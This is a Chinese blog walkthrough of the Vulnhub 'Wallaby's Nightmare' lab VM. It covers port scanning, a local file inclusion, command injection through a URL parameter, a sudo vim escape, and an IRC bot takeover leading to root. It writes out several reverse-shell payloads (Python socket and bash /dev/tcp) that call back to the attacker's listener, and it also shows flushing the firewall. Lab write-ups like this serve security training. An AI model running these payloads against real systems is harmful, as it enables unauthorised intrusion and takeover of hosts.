vulnhub渗透日记20:Wallaby‘s: Nightmare (v1.0.2)

已于 2023-08-02 09:21:19 修改
阅读量99 收藏
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: web安全 linux
于 2023-08-01 17:05:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/132046247
版权

前言

⏰时间:2023.8.1
🗺️靶机地址: https://download.vulnhub.com/wallabys/wallabysnightmare102.rar
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

nmap探测主机端口和服务

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -A -T4 -p- 192.168.58.167    
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
|   256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
|_  256 4c:87:71:4f:af:1b:7c:35:49:ba:58:26:c1:df:b8:4f (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Wallaby's Server
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
6667/tcp filtered irc
MAC Address: 00:0C:29:DF:68:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.047 days (since Sun Jan 15 11:16:44 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80端口
url存在文件包含
在这里插入图片描述在这里插入图片描述
测试直接被ban了

再扫一下是不是开放了别的端口

┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -p- $T                      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 12:45 HKT
Nmap scan report for 192.168.58.167
Host is up (0.000043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown
MAC Address: 00:0C:29:DF:68:78 (VMware)

LFI模糊测试

直接访问60080
依旧可以包含
在这里插入图片描述?page=后面设置变量测试,存在mailer
在这里插入图片描述

反弹SHELL

访问查看源码提示
在这里插入图片描述可以执行命令
在这里插入图片描述执行python的反弹shell

?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.153",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l看下

在这里插入图片描述查看iptable的限制
在这里插入图片描述清空防火墙策略

在这里插入图片描述刚才6667端口显示filtered,现在在扫描看看
在这里插入图片描述

GET Waldo

可以利用/usr/bin/vim

sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
:!bash -i >& /dev/tcp/192.168.58.153/6666 0>&1

在这里插入图片描述在这里插入图片描述

GET wallaby&root

irssi -c 192.168.58.167 -p 6667 -n wallabyschat
/list #查看频道
/join wallabyschat #加入频道

在这里插入图片描述尝试执行命令 .run ls
在这里插入图片描述查看进程

waldo@ubuntu:/home/waldo$ ps aux | grep waldo
waldo       676  0.0  0.3  29416  3104 ?        Ss   Jul31   0:00 tmux new-session -d -s irssi

waldo在使用tmux运行irssi
然后执行命令kill进程

pkill -9 676

/nick waldo,修改用户名为waldo
在这里插入图片描述运行bash反弹shell

.run bash -c 'bash -i >& /dev/tcp/192.168.58.153/8888 0>&1'
sudo su

在这里插入图片描述

_WHOAM1
关注
专栏目录
小白的靶机VulnHub-Wallaby‘s: Nightmare (v1.0.2)
wo41ge的博客
02-13 1万+
靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 开机界面就是这样 还是 采用的桥接模式 确定靶机的IP地址:192.168.1.10 靶机开放了22、80端口 直接访问 随意输入一个用户名 看这个参数 /?page= 之前总结过 直接/etc/passwd 上nikto扫扫 被拒绝了请求 我淦 重新扫描一下 发现80端口关闭了。。。 但是60080端口开启了http服务 继续扫目录 有很多的目录 一个一个看一下
扫描之王——Nmap详解
zhci31462的专栏
04-30 1191
Nmap扫描器的使用简介:   最近媒体报道了许多关于入侵网络的新闻,使人们总以为入侵者只需通过简单工具就可获得电脑的访问权限。但实际上,事情并不是想象中的这么简单。黑客想要 入侵一台电脑,首先要有一套完整的计划。在入侵系统之前,黑客必须先找到一台目标主机,并查出哪些端口在监听之后才能进行入侵。  找出 网络上的主机,测试哪些端口在监听,这些工作通常是由扫描来实现的。扫描网络是黑客进行入侵
vulnhub靶场,WALLABY‘S: NIGHTMARE (V1.0.2)
kukudeshuo的博客
12-03 3743
vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2) 环境准备 靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 攻击机:kali(192.168.109.128) 靶机:WALLABY’S: NIGHTMARE (V1.0.2)(192.168.109.187) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp
No.34-VulnHub-Wallaby's: Nightmare (v1.0.2)-Walkthrough渗透学习
qq_34801745的博客
01-28 976
** VulnHub-Wallaby’s: Nightmare (v1.0.2)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 靶机难度:中级(CTF) 靶机发布日期:2016年12月22日 靶机描述: 这是我的第一台boot2root机器。这是初学者的中级水平。 它已经在VBox和VM...
[Vulnhub] wallabysnightmare LFI+RCE+Irssi聊天服务RCE
06-27 387
#LFI #RCE #Irssi聊天服务RCE
公开:wallaby.js问题的存储库
02-04
**wallaby.js问题存储库详解** `wallaby.js` 是一个强大的自动化测试工具,专为JavaScript和TypeScript开发者设计,支持快速、持续的单元测试和集成测试。它可以在开发过程中实时运行测试,提供即时反馈,从而提升...
atom-wallaby:Wallaby.js Atom包启动器
05-02
Wallaby.js是开发人员生产力工具,可在您键入时立即运行JavaScript和TypeScript测试,并在您的IDE旁边的代码旁边突出显示结果。 快速链接 。 。 。 请注意, ,在免费试用期过后需要许可证。
wallaby-ng-html2js-preprocessor:Wallaby.js 预处理器,用于将 AngularJS 模板编译为 JavaScript
06-22
Wallaby.js 预处理器,用于将 AngularJS 模板编译为 JavaScript。 #安装 最简单的方法是将wallaby-ng-html2js-preprocessor作为 devDependency 保留在package.json 。 { " devDependencies " : { " wallaby-ng-...
wallaby-coffeescript-sample:使用wallaby.js测试CoffeeScript应用程序
05-11
本篇文章将深入探讨如何使用Wallaby.js来测试CoffeeScript应用程序,以及它在`wallaby-coffeescript-sample-master`项目中的应用。 首先,让我们理解CoffeeScript。CoffeeScript是一种简洁、易读的编程语言,它编译...
linux安全
weixin_34378767的博客
02-15 183
http://drops.wooyun.org/  最专业的安全知识分享平台 http://www.freebuf.com/  关注黑客与极客 http://book.beifabook.com/product/BookDetail.aspx?Plucode=712105019 Linux安全体系分析与编程目录 最佳的策略是采用分层的方法,即将“老当益壮”的程序,如...
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
人间体佐菲的博客
10-07 918
【甄选靶场】Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
BackTrack5 学习笔记5 扫描 Nmap
编程圈子-谢厂节的博客
08-16 2494
本系列文章来自《高度安全环境下的高级渗透测试》一书学习笔记。一、NmapNmap 可以用来扫描一个网络、监控服务、帮助列出网络主机等。Nmap能够提供操作类型、开放端口等信息。Nmap脚本引擎可以扩展Nmap的功能。 之前文章简单介绍过其使用: http://blog.csdn.net/xundh/article/details/466423571. NMap家族 ZenMap Neat:基于n
python注入_Python安全编码 — 代码注入的实践与防范
weixin_39626298的博客
12-04 802
什么是代码注入代码注入攻击指的是任何允许攻击者在网络应用程序中注入源代码,从而得到解读和执行的方法。Python中常见代码注入能够执行一行任意字符串形式代码的eval()函数eval("__import__('os').system('uname -a')")能够执行字符串形式代码块的exec()函数exec("__import__('os').system('uname -a')")反序列化一个...
***杂记-2013-07-13
weixin_34355559的博客
07-13 120
从新浪移过来的windows/mssql/mssql_payload扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:36 Scanning...
网络安全详解
weidl001的博客
09-21 1537
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 897
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1328
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
最新发布
weixin_43263566的博客
09-26 215
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 638
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
初学者指南:用Flash和Wallaby创作HTML5动画
"Creating HTML5 Animations with Flash and Wallaby" 是一本专为HTML5初学者设计的实用指南。作者Ian McLean在书中结合了Adobe Flash技术,针对如何利用这些工具来创作HTML5动画进行了深入讲解。这是一本来自Adobe ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值